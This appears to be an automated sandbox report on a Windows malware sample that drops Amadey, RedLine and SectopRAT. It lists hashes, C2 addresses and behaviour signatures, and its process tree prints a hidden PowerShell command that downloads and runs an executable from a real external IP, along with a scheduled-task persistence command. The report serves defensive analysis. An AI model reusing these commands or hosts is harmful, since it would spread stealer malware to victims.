Overview

overview

10

Static

static

5

5QZQM_random.exe

windows7-x64

10

5QZQM_random.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15-02-2025 17:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5QZQM_random.exe

  • Size

    938KB

  • MD5

    2a652936c15591f45c63a9c6c01ed212

  • SHA1

    5dad7de67525e4b6f3ed8e5d6f4257943eac7c62

  • SHA256

    1723bd9dd8938f0a1d3cd89fe50a54f8538d4961c2a15d385e94f0e0f36d9be7

  • SHA512

    64981162e2202c9ed051f5e9a8a04f5760c382fd42a77be3625f6194419f0ee596fb86b68d8a7f8c57b9aa9a4c4dbc90aee1cc69884d45cd572958e2e0b9517f

  • SSDEEP

    24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ay0F:+TvC/MTQYxsWR7ay0

Score
10/10
amadeyredlinesectoprat9c9aa5cheatdefense_evasiondiscoveryexecutioninfostealerrattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
    defense_evasion
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 2 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe
    "C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1180
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1256
        • C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE
          "C:\Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:1768
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1836
            • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
              "C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1288

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\1073578041\tYliuwV.ps1
    Filesize

    768KB

    MD5

    c7b5c7ade500f25ce46fecf31dd278d3

    SHA1

    c22cd6ba0bc78cb3d54c8f5a08cebf36beb4cd8c

    SHA256

    dbb48c518e9c81967e7867a780e3b0a6dfa1033a631ce8421dfca0b52b52e095

    SHA512

    59dec1f7445c02c7177269f8d099f5f1b4928422f929a57bec06b1ce51fc7ff36b475cbbacfa1b7d847ea1fb23812602e50675e9c50ae039b235f96e150e6828

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\1073896001\ViGgA8C.exe
    Filesize

    1.7MB

    MD5

    f662cb18e04cc62863751b672570bd7d

    SHA1

    1630d460c4ca5061d1d10ecdfd9a3c7d85b30896

    SHA256

    1e9ff1fc659f304a408cff60895ef815d0a9d669a3d462e0046f55c8c6feafc2

    SHA512

    ce51435c8fb272e40c323f03e8bb6dfa92d89c97bf1e26dc960b7cab6642c2e4bc4804660d0adac61e3b77c46bca056f6d53bedabcbeb3be5b6151bf61cee8f4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta
    Filesize

    720B

    MD5

    c6910aed9f6537768f85e6410cbbd8ee

    SHA1

    9ac3ba2b01f0e19f9718f74108a5fb0f52691e3b

    SHA256

    1e2daf6bca2110c968aae773c7b92a10d7122fd2fa07edb5054d35226e873571

    SHA512

    af3a7732969935749fee625794944be4164436c4802dd82f05e664c0f8bf588245c5cceb38a5c3e176508bbc3772a13f5e2d46db9b583fb4c3e2f8f0d8c6d9ec

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\52VTCIAENQU2XW1S36AF.temp
    Filesize

    7KB

    MD5

    2f09b9176f9eb831c6f02b0aabb86f06

    SHA1

    acfa4630873566453d0bb9e7676c4ac1518d1503

    SHA256

    0043bded281bbe23e578340e9c8b44549bbc62d01d165c27efca057fe2990721

    SHA512

    0cd983a6d18bcf86bf4fb60c0e38c8bef979e4d4ee2c60cbb024f714d362b32deb14ff79e431baa561751958fcf563b9826144bd20bcbf70920be275704eff59

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    2ac825279630cfaf2b7d3f5ccd7903e7

    SHA1

    d803975a7b0721ae5f64740081d5de3f80cd1fbe

    SHA256

    36db64ff9322bb2db2718e8736c7d6131dab26e9550af58dfaec89bead152f28

    SHA512

    4ceb98b4967dedc7d6131a2b0680fed4b316abca3466d2c4240c1560d69d6842b7fb3ae7b79ce8e3059a7a334bc31b97d30eab549234d4b0332f610e72e4efef

    Download Submit

  • \Users\Admin\AppData\Local\TempNP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE
    Filesize

    2.1MB

    MD5

    569e59d6838517ef40ad5d42d5ffe3ab

    SHA1

    06e6b6e5fa09611b56aa56bc81173cfcbd138640

    SHA256

    772137b7c1ca4002181b9252143c9793c9f45c0935564a75d44fbc6d2aa33d30

    SHA512

    1ac54228ffa2a71de44dba4e68b24426db3c17a09140fd441be8be92c7f5758fc46bb7f0e9501019efce68e3a745eece7da4284c89d5dd039f4b3c0e5434b768

    Download Submit

  • memory/1256-13-0x0000000006630000-0x0000000006AF2000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1256-12-0x0000000006630000-0x0000000006AF2000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1288-78-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1288-77-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1288-76-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1288-81-0x0000000001350000-0x00000000017C8000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/1768-15-0x0000000000B30000-0x0000000000FF2000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1768-29-0x00000000070D0000-0x0000000007592000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/1768-31-0x0000000000B30000-0x0000000000FF2000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-35-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-54-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-55-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-57-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-58-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-59-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-60-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-61-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-53-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-38-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-75-0x0000000006990000-0x0000000006E08000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/2552-37-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-36-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-79-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download

  • memory/2552-80-0x0000000006990000-0x0000000006E08000-memory.dmp

    Filesize

    4.5MB

    Download

  • memory/2552-32-0x00000000010B0000-0x0000000001572000-memory.dmp

    Filesize

    4.8MB

    Download